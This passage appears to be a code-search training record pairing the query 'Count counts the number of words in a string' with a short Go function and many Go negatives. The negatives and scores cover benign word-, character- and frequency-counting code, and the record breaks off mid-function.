\"± § > < 1 ! 2 @ 3 # № 5 % : 6 ^ , 7 & . 8 * ; 9 ( 0 ) - _ = + ] [ ` ~ \"\n\tfa := NewFrequencyAnalyzer(inputString)\n\n\tactualWords := fa.Search()\n\tassert.Nil(t, actualWords)\n}", "func printFreq(m map[rune]int) {\n\tvar (\n\t\ttotalC, uniqueC int\n\t)\n\tf := sortFreq(m)\n\tfmt.Println(\"Char\\tFreq\")\n\tfor _, s := range f {\n\t\ttotalC += s.freq\n\t\tuniqueC++\n\t\tfmt.Printf(\"%q\\t%d\\n\", s.char, s.freq)\n\t}\n\tfmt.Println(\"Unique chars:\\t\", uniqueC)\n\tfmt.Println(\"Total chars:\\t\", totalC)\n}", "func beautyScore(line string) int {\n\tfreqs := make(map[rune]int)\n\tc := Counter{}\n\tfor _, char := range line {\n\t\tif unicode.IsLetter(char) {\n\t\t\tchar = unicode.ToLower(char)\n\t\t\tfreqs[char] += 1\n\t\t\tc.Add(char)\n\t\t}\n\t}\n\tmc := c.MostCommon(0)\n\tscore := 26 // We know we must start at 26 and then go down\n\tbeauty := 0\n\tfor ix, item := range mc {\n\t\tcount := item.Count\n\t\tbeauty += count * (score - ix)\n\t}\n\treturn beauty\n}", "func FrequencyScore(plainText []byte, frequencies map[byte]float64) float64 {\n\tscore := 0.0\n\tfor i := 0; i < len(plainText); i++ {\n\t\tfor character, frequency := range frequencies {\n\t\t\tif plainText[i] == character {\n\t\t\t\tscore += frequency\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\t/*\n\t\tBecause a longer text or a longer list of frequencies\n\t\twill yield a higher score than a subset of the same text (or frequencies),\n\t\twe normalise it.\n\t*/\n\tnormalised := score / float64(len(plainText)*len(frequencies))\n\treturn normalised\n}", "func mostCommonWord(paragraph string, banned []string) string {\n\tparag := strings.ToLower(paragraph)\n\treg, _ := regexp.Compile(\"[^a-z ]+\") // non a-z or non space\n\tparag = reg.ReplaceAllString(parag, \" \") // remove symbols\n\twords := strings.Fields(parag)\n\n\tfmt.Println(parag)\n\n\tduplicate := make(map[string]int)\n\n\tfor _, item := range words {\n\n\t\tif !inArray(item, banned) {\n\t\t\t// check if the item/element exist in the duplicate map\n\t\t\t_, exist := duplicate[item]\n\n\t\t\tif exist {\n\t\t\t\tduplicate[item] += 1 // increase counter by 1 if already in the map\n\t\t\t} else {\n\t\t\t\tduplicate[item] = 1 // else start counting from 1\n\t\t\t}\n\t\t}\n\n\t}\n\n\tmaxCount := 0\n\tresultWord := \"\"\n\tfor key, value := range duplicate {\n\t\tif value >= maxCount {\n\t\t\tmaxCount = value\n\t\t\tresultWord = key\n\t\t}\n\t}\n\treturn resultWord\n}", "func ConcurrentFrequency(texts []string) FreqMap {\n\tc := make(chan FreqMap)\n\tdefer close(c)\n\n\t// call Frequency once for each text, pipe into chan\n\tfor _, s := range texts {\n\t\tgo func(s string) {\n\t\t\tc <- Frequency(s)\n\t\t}(s)\n\t}\n\n\tm := FreqMap{}\n\n\t// use texts just as a count for how many times to receive from chan\n\tfor range texts {\n\t\tfreqMap := <-c\n\t\tfor r, n := range freqMap {\n\t\t\tm[r] += n\n\t\t}\n\t}\n\treturn m\n}", "func countOccurrences(msg string) map[string]int {\n\thashMap := make(map[string]int)\n\ttChar := strings.Split(msg, \"\")\n\tfor _, char := range tChar {\n\t\tif hashMap[char] == 0 {\n\t\t\thashMap[char] = 1\n\t\t} else {\n\t\t\thashMap[char]++\n\t\t}\n\t}\n\treturn hashMap\n}", "func (d DNA) Counts() (Histogram, error) {\n\th := newHistogram()\n\tfor _, n := range d {\n\t\tif _, ok := h[n]; ok {\n\t\t\th[n]++\n\t\t} else {\n\t\t\treturn nil, fmt.Errorf(\"illegal nucleotide symbol: %s\", string(n))\n\t\t}\n\t}\n\n\treturn h, nil\n}" ]
[ "0.7763038", "0.73953384", "0.7333299", "0.71743727", "0.71503794", "0.71230376", "0.7068362", "0.70434093", "0.7006203", "0.69521755", "0.693619", "0.68756694", "0.68202", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6796691", "0.6790708", "0.6771113", "0.6769579", "0.67578256", "0.6746994", "0.6740851", "0.66629255", "0.662448", "0.6576952", "0.65741616", "0.65348023", "0.65038365", "0.6502963", "0.6471883", "0.64271843", "0.64085287", "0.64072114", "0.64009166", "0.63972276", "0.63718814", "0.6369965", "0.6283081", "0.62620836", "0.6226731", "0.6195052", "0.61481047", "0.61271316", "0.61271316", "0.6098415", "0.6093405", "0.60906345", "0.607449", "0.6060815", "0.605889", "0.60514337", "0.6033125", "0.6031666", "0.60236764", "0.60156155", "0.6004963", "0.5995262", "0.5992154", "0.5967206", "0.59323233", "0.5929014", "0.5921294", "0.5913858", "0.5908979", "0.5897753", "0.5892777", "0.58500636", "0.5834267", "0.58276516", "0.57926035", "0.578029", "0.57762456", "0.57233405", "0.5707829", "0.5696371", "0.5689829", "0.56883097", "0.5648905", "0.55876166", "0.55808765", "0.5574302", "0.5566675", "0.5566417", "0.5539278", "0.55379987", "0.5524998", "0.55130976" ]
0.71184224
8
Count counts the number of words in a string and returns the result as an int
func Count(s string) int { xs := strings.Fields(s) return len(xs) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func wordCount(str string) int {\n\treturn len(strings.Fields(str))\n}", "func countWords(str string) int {\n\tword := regexp.MustCompile(\"\\\\S+\")\n\ts := word.FindAllString(str, -1)\n\treturn len(s)\n}", "func WordCount(s string) Frequency {\n\twords := wordRegex.FindAllString(s, -1)\n\tresult := make(Frequency)\n\tfor _, word := range words {\n\t\tresult[strings.ToLower(word)]++\n\t}\n\treturn result\n}", "func WordCount(s string) map[string]int {\n\tvar words = make(map[string]int)\n\tfor _, v := range strings.Fields(s) {\n\t\tif words[v] == 0 {\n\t\t\twords[v] = 1\n\t\t} else {\n\t\t\twords[v]++\n\t\t}\n\t}\n\treturn words\n}", "func WordCount(s string) map[string]int {\n \n\twords := strings.Fields(s)\n wordCountMap := make(map[string]int)\n \n for _,word := range words{\n wordCountMap[word]++ \n }\n \n return wordCountMap\n}", "func WordCount(s string) map[string]int {\n\tm := map[string]int{}\n\tf := strings.Fields(s)\n\t// fmt.Printf(\"%T %v %v\\n\", f, f, len(f))\n\tfor _, v := range f {\n\t\tm[v]++\n\t}\n\treturn m\n}", "func WordCount(s string) map[string]int {\n\twcount := make(map[string]int)\n\tfor _, v := range strings.Fields(s) {\n\t\twcount[v] = wcount[v] + 1\n\t}\n\treturn wcount\n}", "func WordCount(s string) map[string]int {\n\twordsMap := map[string]int{}\n\twords := strings.Split(s, \" \")\n\tfor _, word := range words {\n\t\tif _, ok := wordsMap[word]; ok {\n\t\t\twordsMap[word]++\n\t\t} else {\n\t\t\twordsMap[word] = 1\n\t\t}\n\t\t// can just do wordsMap[word]++ because then accessing\n\t\t// a nonexistent then the zero value will be 0, but this\n\t\t// way is better for cases where its something that needs\n\t\t// proper initialization.\n\t}\n\treturn wordsMap\n}", "func WordCount(s string) map[string]int {\n\twords := strings.Fields(s)\n\twc := make(map[string]int)\n\tfor i := range words {\n\t\twc[words[i]]++\n\t}\n\treturn wc\n\n}", "func countWordsInString(sInput string) map[string]int {\n\t//change the input into a rune array\n\tsTemp := []rune(sInput)\n\treturn (countWordsInRunes(sTemp))\n}", "func WordCount(s string) map[string]int {\n\tfreq := make(map[string]int)\n\tfor _, word := range strings.Fields(s) {\n\t\tfreq[word] += 1\n\t}\n\treturn freq\n}", "func WordCount(phrase string) Frequency {\n\tvar f Frequency = make(Frequency)\n\tphrase = strings.ToLower(phrase)\n\n\tre := regexp.MustCompile(\"[a-z0-9]+('[a-z0-9]+|[a-z0-9]*)\")\n\twords := re.FindAllString(phrase, -1)\n\n\tfor _, v := range words {\n\t\tif len(v) > 0 {\n\t\t\tf[v]++\n\t\t}\n\n\t}\n\treturn f\n}", "func wordCount(s string) map[string]int {\n\tt := re.FindAllStringSubmatch(s, -1)\n\tif t == nil {\n\t\treturn nil\n\t}\n\n\thash := make(map[string]int)\n\tfor i := 0; i < len(t); i++ {\n\t\tword := t[i][1]\n\t\tif _, ok := hash[word]; ok {\n\t\t\thash[word]++\n\t\t} else {\n\t\t\thash[word] = 1\n\t\t}\n\t}\n\n\treturn hash\n}", "func countWordLen(str string) []int {\n\tss := strings.Split(str, \" \")\n\tcount := make([]int, len(ss))\n\tfor i := 0; i < len(ss); i++ {\n\t\tcount[i] = len(ss[i])\n\t}\n\treturn count\n}", "func words(s string) int {\n\tb, n := true, 0\n\tfor _, r := range []rune(s) {\n\t\tswitch {\n\t\tcase unicode.IsSpace(r):\n\t\t\tb = true\n\t\tcase b:\n\t\t\tb = false\n\t\t\tn++\n\t\t}\n\t}\n\treturn n\n}", "func WordCount(input string) (result Frequency) {\n\tresult = make(Frequency)\n\trinput := []rune(strings.ToLower(input))\n\n\tstop, start := 0, 0\n\tfor nstop, r := range rinput {\n\t\tstop = nstop\n\t\tif isWhitemark(r) {\n\t\t\tfor ; start < len(rinput) && isWhitemark(rinput[start]); start++ {\n\t\t\t}\n\n\t\t\tif start < stop {\n\t\t\t\tresult[getKey(rinput, start, stop)]++\n\t\t\t\tstart = stop + 1\n\t\t\t}\n\t\t}\n\t}\n\n\tif len(rinput[start:]) > 0 {\n\t\tresult[getLastKey(rinput, start)]++\n\t}\n\n\treturn\n}", "func CountWords(str string) map[string]int {\n\tm := make(map[string]int)\n\tbuffer := bytes.NewBuffer(nil)\n\tfor _, r := range []rune(str) {\n\t\tif unicode.IsSpace(r) {\n\t\t\tif buffer.Len() > 0 {\n\t\t\t\tm[buffer.String()]++\n\t\t\t\tbuffer.Reset()\n\t\t\t}\n\t\t} else {\n\t\t\tbuffer.WriteRune(r)\n\t\t}\n\t}\n\tif buffer.Len() > 0 {\n\t\tm[buffer.String()]++\n\t}\n\treturn m\n}", "func Count(str, operand string) int { return strings.Count(operand, str) }", "func WordCount(phrase string) Frequency {\n\n\tfreqs := make(Frequency)\n\t//a word is an extent of alphabetic characters\n\tre := regexp.MustCompile(\"[[:alnum:]]+\")\n\t//for each word we find ...\n\tfor _, word := range re.FindAllString(phrase, -1) {\n\t\t//increment the frequency of the word (words are all lowercased)\n\t\tfreqs[strings.ToLower(word)]++\n\t}\n\treturn freqs\n}", "func WordCount(s string) map[string]int {\n\n\t// Split strings on spaces (e.g. isSpace)\n\twords := strings.Fields(s)\n\tfmt.Println(words)\n\n\twordCounts := make(map[string]int)\n\n\tfor _, word := range words {\n\n\t\t// Words cannot start or end with - or '\n\t\tif !(strings.HasPrefix(word, \"-\") || strings.HasPrefix(word, \"'\") || strings.HasSuffix(word, \"-\") || strings.HasSuffix(word, \"'\")) {\n\n\t\t\t_, ok1 := stopwords[word]\n\n\t\t\tif !ok1 {\n\t\t\t\t_, ok2 := wordCounts[word]\n\n\t\t\t\tif ok2 {\n\t\t\t\t\twordCounts[word] += 1\n\t\t\t\t} else {\n\t\t\t\t\twordCounts[word] = 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn wordCounts\n}", "func WordCount(s string) map[string]int {\n\n\tvar m map[string]int\n\n\twords := strings.Fields(s)\n\n\tm = make(map[string]int, len(words))\n\n\tfor _, w := range words {\n\t\t_, ok := m[w]\n\t\tif ok != true {\n\t\t\tm[w] = 1\n\t\t} else {\n\t\t\tm[w]++ // m[w] += 1 should be replaced with m[w]++\n\t\t}\n\t}\n\treturn m\n}", "func countWordLenByAppend(str string) []int {\n\tcount := []int{}\n\tfor _, s := range strings.Split(str, \" \") {\n\t\tcount = append(count, len(s))\n\t}\n\treturn count\n}", "func countWordLenByCounter(str string) []int {\n\tif len(str) == 0 {\n\t\treturn []int{0}\n\t}\n\tstr = strings.Replace(str, \",\", \"\", -1)\n\n\tcount := []int{}\n\tcounter := 0\n\tfor _, s := range str {\n\t\tif (s != ' ') && (s != '.') {\n\t\t\tcounter++\n\t\t\tcontinue\n\t\t}\n\t\tcount = append(count, counter)\n\t\tcounter = 0\n\t}\n\treturn count\n}", "func CountWords(bytes *[]byte) int {\n\tnumWords := 0\n\tisWord := false\n\n\tfor _, c := range *bytes {\n\t\tr := rune(c)\n\t\tif unicode.IsLetter(r) {\n\t\t\tisWord = true\n\t\t} else if isWord && !unicode.IsLetter(r) {\n\t\t\tnumWords++\n\t\t\tisWord = false\n\t\t}\n\t}\n\n\treturn numWords\n}", "func Count(s string) int {\n\treturn utf8.RuneCountInString(s)\n}", "func totalWords(t string) int {\n\tfound := false\n\tc := 0\n\n\tfor _, i := range t {\n\t\tcheck := found\n\t\tfound = !unicode.IsSpace(i)\n\t\tif found && !check {\n\t\t\tc++\n\t\t}\n\t}\n\treturn c\n}", "func WordCount(s string) Messages {\n\tstrs := strings.Fields(s)\n\tres := make(map[string]int)\n\n\tfor _, str := range strs {\n\t\tif len(str) > 2 {\n\t\t\tres[strings.ToLower(str)]++\n\t\t}\n\t}\n\n\tmessages := []Msg{}\n\n\tfor k, v := range res {\n\t\tm := Msg{\n\t\t\tText: k,\n\t\t\tCount: v,\n\t\t}\n\t\tmessages = append(messages, m)\n\t}\n\n\treturn messages\n}", "func Count(s string) int {\n\t// write the code for this func\n\treturn len(strings.Fields(s))\n}", "func Counter(str string) int {\n\tif len(str) == 0 {\n\t\treturn 0\n\t}\n\t\n\tvar count, index, brk int\n\trunes := []rune(str)\n\t\n\tl := len(runes)\n\t\n\tfor {\n\t\tbrk = nextBreak(str, index)\n\t\tif brk < l {\n\t\t\tindex = brk\n\t\t\tcount++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\t\n\tif index < l {\n\t\tcount++\n\t}\n\treturn count\n}", "func wordCount(filename string)(int, time.Duration){\n\tstartTime := time.Now()\n\tfile, err := os.Open(filename)\n\tif err != nil {\n\t\treturn -1000, time.Since(startTime)\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\ttotWc := 0\n\tfor scanner.Scan() {\n\t\twords := strings.Fields(scanner.Text())\n\t\ttotWc += len(words)\n\t}\n\tdur := time.Since(startTime)\n\treturn totWc, dur\n}", "func countWords(sInput string){\n\twordMap := make(map[string]int)\n\tfmt.Println(wordMap)\n}", "func wordToInt(s string) int {\n\tsum := 0\n\tfor _, v := range s {\n\t\tsum += int(v) - 'A' + 1\n\t}\n\treturn sum\n\n}", "func Count(str string, pattern string) int {\n\treturn xstrings.Count(str, pattern)\n}", "func (word ControlWord) Count() int {\n\treturn int((uint32(word) >> 20) & 0xF)\n}", "func (StringService) Count(s string) int {\n\treturn len(s)\n}", "func countWords(fname string) int {\n\t//open file\n\tf, error := os.Open(fname)\n\t//handle error\n\terror_handler(error)\n\t\n\t//store file in buffer\n\tfscan := bufio.NewScanner(f)\n\t\n\t//split file into lines\n\tfscan.Split(bufio.ScanLines)\n\t\n\t//scan line\n\tfscan.Scan()\n\t\n\t//store words in line\n\twords := strings.Fields(fscan.Text())\n\t\n\t//count and return number of words\n\treturn len(words)\n}", "func Count(s, substr string) int {\n\treturn strings.Count(s, substr)\n}", "func WordCounts(r io.Reader) (map[string]int, error) {\n\tinstream := NewTokenizer().Tokenize(r)\n\twc := make(map[string]int)\n\tfor token := range instream {\n\t\twc[token] = wc[token] + 1\n\t}\n\treturn wc, nil\n}", "func (s *String) Count() int {\n\treturn len(s.s)\n}", "func Count(str, substr string) int {\n\treturn strings.Count(str, substr)\n}", "func WordsCount() {\n\tvar mutex = &sync.Mutex{}\n\tvar counter = make(map[string]int)\n\tvar inputs = readInputParams()\n\tvar paths = getValidPaths(inputs)\n\n\tresources := make([]interface{}, len(paths))\n\tfor i, path := range paths {\n\t\tresources[i] = path\n\t}\n\tpool := workerpool.NewPool(numWorkers)\n\tpool.Start(resources, count(counter, mutex), resultsCollector)\n\n\tfmt.Println(counter)\n}", "func countDemo(a string, b string) int {\n\treturn strings.Count(a, b)\n}", "func wordLetterCount(c byte) (nletter int, nword int, nline int) {\n\tinputReader := bufio.NewReader(os.Stdin)\n\tfmt.Println(\"Please enter something: \")\n\tbytes, err := inputReader.ReadBytes(c)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn -1, -1, -1\n\t}\n\tvar (\n\t\tnByte = len(bytes)\n\t\tnSpace int\n\t\tnLetter int\n\t\tnWord int\n\t\tnLine = 1\n\t\tflag = true\n\t)\n\tfor _, v := range bytes {\n\t\tif v == ' ' {\n\t\t\tflag = true\n\t\t\tnSpace++\n\t\t} else if v == '\\n' {\n\t\t\tflag = true\n\t\t\tnLine++\n\t\t} else {\n\t\t\tif flag {\n\t\t\t\tnWord++\n\t\t\t}\n\t\t\tflag = false\n\t\t}\n\t}\n\tnLetter = nByte - nLine + 1\n\tfmt.Printf(\"nLetters = %d, nWord = %d, nLine = %d\\n\", nLetter, nWord, nLine)\n\treturn nLetter, nWord, nLine\n}", "func (it MyString) MyCount() int {\n\treturn len(it)\n}", "func WordCount(content string) <-chan map[string]int {\n\twc := make(chan map[string]int)\n\tgo func() {\n\t\ts := strings.Fields(content)\n\t\tm := make(map[string]int)\n\t\tfor _, word := range s {\n\t\t\t_, ok := m[word]\n\t\t\tif ok {\n\t\t\t\tm[word]++\n\t\t\t} else {\n\t\t\t\tm[word] = 1\n\t\t\t}\n\t\t}\n\n\t\twc <- m\n\t\tclose(wc)\n\t}()\n\treturn wc\n}", "func countWords(in <-chan string) {\n\twg.Add(1)\n\tgo func() {\n\t\tdefer wg.Done()\n\t\tresult := make(map[string]int)\n\t\tfor l := range in {\n\t\t\tfor _, pc := range replaceChars {\n\t\t\t\tl = strings.Replace(l, string(pc), \"\", -1)\n\t\t\t}\n\t\t\tl = strings.ToLower(l)\n\t\t\twords := strings.Split(l, \" \")\n\t\t\tfor _, w := range words {\n\t\t\t\tresult[w] = result[w] + 1\n\t\t\t}\n\t\t}\n\t\tresults <- result\n\t}()\n}", "func Count(subString, fullString string) int {\n\tcount := 0\n\tfor _, s := range utils.AllSubstrings(fullString) {\n\t\tif MatchString(subString, s) { // need to reconstruct the nfa for each substring\n\t\t\tcount++\n\t\t}\n\t}\n\treturn count\n}", "func countFreq(s string) map[rune]int {\n\tfreqMap := make(map[rune]int)\n\tfor _, c := range s {\n\t\tfreqMap[c] += 1\n\t}\n\treturn freqMap\n}", "func freqAnalyze(text string) freqDistr {\n\twords := map[string]int{}\n\n\tspaceReplace := func(r rune) rune {\n\t\tswitch r {\n\n\t\tcase '.', ',', '!', '?', ':', ';', '-', '—', '\\r', '\\n', '\\t':\n\t\t\treturn ' '\n\t\t}\n\t\treturn unicode.ToLower(r)\n\t}\n\n\tsplits := strings.Split(strings.Map(spaceReplace, text), \" \")\n\n\tfor _, s := range splits {\n\t\tif s != \"\" {\n\t\t\twords[s]++\n\t\t}\n\t}\n\treturn words\n}", "func parseCount(s string) int {\n\tvar n int64 = 1\n\tvar err error\n\tif len(s) > 0 {\n\t\tn, err = strconv.ParseInt(s, 10, 32)\n\t\tif err != nil {\n\t\t\tpanic(\"could not parse action multiplier\")\n\t\t}\n\t}\n\treturn int(n)\n}", "func countWordsInRunes(sTemp []rune) map[string]int {\n\t//build a map for kv\n\twordMap := make(map[string]int)\n\n\t//find a word\n\ti, lInput := 0, len(sTemp)\n\tfmt.Printf(\"length of input is %d\\n\", lInput)\n\tstart := time.Now()\n\tfmt.Println(\"Time is \", start)\n\tfor i < lInput {\n\t\t//make a slice for a word\n\t\tsWord := make([]rune, 100)\n\t\tj := 0\n\t\tfor i < lInput && isLegal(sTemp[i]) {\n\t\t\tsWord[j] = sTemp[i]\n\t\t\ti++\n\t\t\tj++\n\t\t}\n\n\t\t//add a kv\n\t\tword := string(sWord[:j])\n\t\tfmt.Println(word)\n\t\tfmt.Printf(\"Start to find the word %s...\\n\", word)\n\n\t\tv, ok := wordMap[word]\n\t\tif ok {\n\t\t\twordMap[word] = v + 1\n\t\t\tfmt.Println(\"found!\")\n\t\t} else {\n\t\t\twordMap[word] = 1\n\t\t\tfmt.Println(\"Not found...\")\n\t\t}\n\t\tfmt.Println(\"Time is \", time.Now())\n\t\t//jump to next word\n\t\ti++\n\t}\n\tfmt.Printf(\"Cost %v\\n\", time.Now().Sub(start))\n\treturn wordMap\n}", "func main() {\n\t// currently it prints 17\n\t// it should print 5\n\n\tname := \"inanç \"\n\tfmt.Println(utf8.RuneCountInString(strings.TrimRight(name, \" \")))\n}", "func CountTwo(s string) int {\n\tc := 0\n\tm := UseCount(s)\n\tfor _, v := range m {\n\t\tc += v\n\t}\n\treturn c\n}", "func countStrings(fileName string) map[string]int {\n\n\tvar wordMap map[string]int = make(map[string]int)\n\n\tallBytes, err := ioutil.ReadFile(fileName)\n\n\tif err != nil {\n\t\tpanic(\"Is not able to read a file or file does not exists\")\n\t}\n\n\t// type cast the content we red from file to string\n\tallString := string(allBytes)\n\n\t// Split the big string to small string word by word\n\twords := strings.Split(allString, \" \")\n\n\tfor _, w := range words {\n\n\t\tif w != \" \" || w != \"\\n\" {\n\n\t\t\t_, sk := wordMap[w]\n\n\t\t\tif sk {\n\t\t\t\twordMap[w]++\n\t\t\t} else {\n\t\t\t\twordMap[w] = 1\n\t\t\t}\n\n\t\t}\n\t}\n\n\treturn wordMap\n}", "func lengthOfLastWord(s string) int {\n\tif len(s) == 0 {\n\t\treturn 0\n\t}\n\n\tl := len(s)\n\tfor l > 0 && s[l-1] == ' ' {\n\t\tl--\n\t}\n\n\tcnt := 0\n\tfor l > 0 && s[l-1] != ' ' {\n\t\tcnt++\n\t\tl--\n\t}\n\n\treturn cnt\n}", "func getLengthOfNextWord(stringToParse string, startingCharacterIndex int) int {\n\tvar lengthOfNextWord int\n\tfor currentCharacterIndex := startingCharacterIndex; currentCharacterIndex < len(stringToParse); currentCharacterIndex++ {\n\t\tif stringformat.GetSubString(stringToParse, currentCharacterIndex, 1) == \" \" {\n\t\t\treturn lengthOfNextWord\n\t\t}\n\t\tlengthOfNextWord++\n\t}\n\treturn lengthOfNextWord\n}", "func word_count(words []string, m map[string]string, keys *[]string, line_count int) {\n\t//Enter your code here. Read input from STDIN. Print output to STDOUT\n\tfor _, v := range words {\n\t\tif val, ok := m[v]; ok {\n\t\t\tm[v] = val + \" \" + strconv.Itoa(line_count)\n\t\t} else {\n\t\t\tm[v] = strconv.Itoa(line_count)\n\t\t\t*keys = append(*keys, v)\n\t\t}\n\t}\n}", "func WordScore(plainText []byte, punctuation []byte, dictionary [][]byte) int {\n\tif len(plainText) == 0 {\n\t\treturn 0\n\t}\n\t/* always use lowercase for simplicity */\n\tlPlainText := bytes.ToLower(plainText)\n\tvar words [][]byte\n\tif len(punctuation) == 0 {\n\t\twords = dictionary\n\t} else {\n\t\tfor _, word := range dictionary {\n\t\t\tfor _, p := range punctuation {\n\t\t\t\tword = append(word, p)\n\t\t\t\twords = append(words, word)\n\t\t\t}\n\t\t}\n\t}\n\ttotal := 0\n\tfor _, word := range words {\n\t\tif len(word) > 0 {\n\t\t\tlWord := bytes.ToLower(word)\n\t\t\ttotal += bytes.Count(lPlainText, lWord)\n\t\t}\n\t}\n\treturn total\n}", "func countCharacters(words []string, chars string) int {\n sum := 0\n m := [26]byte{}\n for _, v := range chars {\n m[v-'a']+=1\n }\n for _, v := range words {\n sum += len(v)\n m2 := [26]byte{}\n for _, j := range v {\n m2[j-'a']+=1\n if m2[j-'a'] > m[j-'a'] {\n sum -= len(v)\n break\n }\n }\n }\n return sum\n}", "func (s StringCount) Len() int {\n return len(s)\n}", "func Count_character(input_str string) int {\n\ttemp_str := Clean_up(input_str)\n\ttemp_arr := strings.Split(temp_str, \"\")\n\treturn len(temp_arr) \n}", "func ExampleScanner_words() {\n\t// An artificial input source.\n\tconst input = \"Now is the winter of our discontent,\\nMade glorious summer by this sun of York.\\n\"\n\tscanner := bufio.NewScanner(strings.NewReader(input))\n\t// Set the split function for the scanning operation.\n\tscanner.Split(bufio.ScanWords)\n\t// Count the words.\n\tcount := 0\n\tfor scanner.Scan() {\n\t\tcount++\n\t}\n\tif err := scanner.Err(); err != nil {\n\t\tfmt.Fprintln(os.Stderr, \"reading input:\", err)\n\t}\n\tfmt.Printf(\"%d\\n\", count)\n\t// Output: 15\n}", "func (wq *WordQuery) Count(ctx context.Context) (int, error) {\n\tif err := wq.prepareQuery(ctx); err != nil {\n\t\treturn 0, err\n\t}\n\treturn wq.sqlCount(ctx)\n}", "func lengthOfLastWord(s string) int {\n\tarr := strings.Split(strings.Trim(s, \" \"), \" \")\n\tlength := len(arr)\n\tres := 0\n\tfor i := length - 1; i >= 0; i-- {\n\t\tif arr[i] == \" \" {\n\t\t\tcontinue\n\t\t} else {\n\t\t\tres = len(arr[i])\n\t\t\tbreak\n\t\t}\n\t}\n\treturn res\n}", "func Count(spin string) int {\n\tcount := 1\n\tmatches := re.FindAllString(spin, -1)\n\tfor _, match := range matches {\n\t\tparts := strings.Split(match[1:len(match)-1], \"|\")\n\t\tif len(parts) >= 1 {\n\t\t\tcount *= len(parts)\n\t\t}\n\t}\n\treturn count\n}", "func wordFreq(filename string, word string)(int, time.Duration){\n\tstartTime := time.Now()\n\tfile, err := os.Open(filename)\n\tif err != nil {\n\t\treturn -1000, time.Since(startTime)\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\twc := 0\n\tfor scanner.Scan() {\n\t\twords := strings.Fields(scanner.Text())\n\t\tfor _, lword := range words {\n\t\t\tif lword == word || lword == word+\",\" || lword == word+\".\"{\n\t\t\t\twc += 1\n\t\t\t}\n\t\t}\n\t}\n\n\tdur := time.Since(startTime)\n\treturn wc, dur\n}", "func (cMap *MyStruct) GetCount(word string) int{\n\tcMap.asking <- word\n\tcount := <- cMap.temp\n\tfmt.Println(\"Word Count for \",word, \"is \",count)\n\treturn count\n}", "func CountIgnoreCase(haystack io.Reader, needle string) (int, error) {\n\toccurrences, err := FindIgnoreCase(haystack, needle)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn len(occurrences), nil\n}", "func CountLeadingWhitespace(str string) int {\n\tws := 0\n\tfor _, c := range str {\n\t\tif c == ' ' || c == '\\t' {\n\t\t\tws++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn ws\n}", "func camelcase(s string) int32 {\n if len(s) == 0 {\n return 0\n }\n\n var count int32 = 0\n runes := []rune(s)\n\n if unicode.IsLower(runes[0]) {\n count = 1\n }\n\n for _, run := range runes {\n if unicode.IsUpper(run) {\n count++\n }\n }\n\n return count\n}", "func countingValleys(n int32, s string) int32 {\n\n l, v := 0, 0\n s = strings.ToLower(s)\n for _, r := range s {\n\n if r == 'u' {\n if l < 0 && l+1 == 0 {\n v++\n }\n l++\n\n } else {\n l--\n }\n }\n return int32(v)\n}", "func SpellCount(xml []byte) int {\n\tr := regexp.MustCompile(`(events_onGesture)`)\n\tres := r.FindAllStringSubmatch(string(xml), -1)\n\treturn len(res)\n}", "func countWordLenByRecursiveFunc(ss []string) []int {\n\tif len(ss) == 0 {\n\t\treturn []int{}\n\t}\n\treturn append([]int{len(ss[0])}, countWordLenByRecursiveFunc(ss[1:])...)\n}", "func lengthOfLastWordMy(s string) int {\n\tl := 0\n\tfor i, v := range s {\n\t\tif v != 32 {\n\t\t\tif i > 1 {\n\t\t\t\tlast := s[i-1]\n\t\t\t\tif last == ' ' {\n\t\t\t\t\tl = 1\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tl++\n\t\t} else {\n\t\t\tcontinue\n\t\t}\n\t}\n\treturn l\n}", "func UseCount(s string) map[string]int {\n\txs := strings.Fields(s)\n\tm := make(map[string]int)\n\tfor _, v := range xs {\n\t\tm[v]++\n\t}\n\treturn m\n}", "func UseCount(s string) map[string]int {\n\txs := strings.Fields(s)\n\tm := make(map[string]int)\n\tfor _, v := range xs {\n\t\tm[v]++\n\t}\n\treturn m\n}", "func UseCount(s string) map[string]int {\n\txs := strings.Fields(s)\n\tm := make(map[string]int)\n\tfor _, v := range xs {\n\t\tm[v]++\n\t}\n\treturn m\n}", "func LetterCount(s string) int {\n\tvar res int\n\tfor _, r := range s {\n\t\tif r == '-' || r == ' ' {\n\t\t\tcontinue\n\t\t}\n\t\tres++\n\t}\n\treturn res\n}", "func execRuneCountInString(_ int, p *gop.Context) {\n\targs := p.GetArgs(1)\n\tret := utf8.RuneCountInString(args[0].(string))\n\tp.Ret(1, ret)\n}", "func NumOccurrences(s string, c byte) int {\n\tvar n int\n\tfor i := 0; i < len(s); i++ {\n\t\tif s[i] == c {\n\t\t\tn++\n\t\t}\n\t}\n\treturn n\n}", "func CountStems(in []byte) (map[string]int, error) {\n\tcounter := NewCounter()\n\tscanner := bufio.NewScanner(bytes.NewReader(in))\n\tscanner.Split(stemScanWords)\n\n\tfor scanner.Scan() {\n\t\tword := scanner.Bytes()\n\t\tif stem := Stem(word); stem != nil {\n\t\t\tcounter.Add(stem)\n\t\t}\n\t}\n\treturn counter.GetOccurrences(), scanner.Err()\n}", "func (c *Cluster) Wordcount() int { return c.words }", "func mostWordsFound(sentences []string) int {\n\tvar initLen = 0\n\tfor _, v := range sentences {\n\t\tspl := strings.Split(v, \" \")\n\t\tstrLen := len(spl)\n\t\tif strLen > initLen {\n\t\t\tinitLen = strLen\n\t\t}\n\t}\n\treturn initLen\n}", "func ComputeLength(s string) int {\n\t// From utf16 package.\n\tn := 0\n\tfor _, v := range s {\n\t\tn += utf16RuneLen(v)\n\t}\n\treturn n\n}", "func CountScore(stream string) (int, int) {\n\tvar garbage, ignore bool\n\tvar totalScore, groupScore, allGarbage int\n\n\tfor _, r := range stream {\n\t\tif ignore 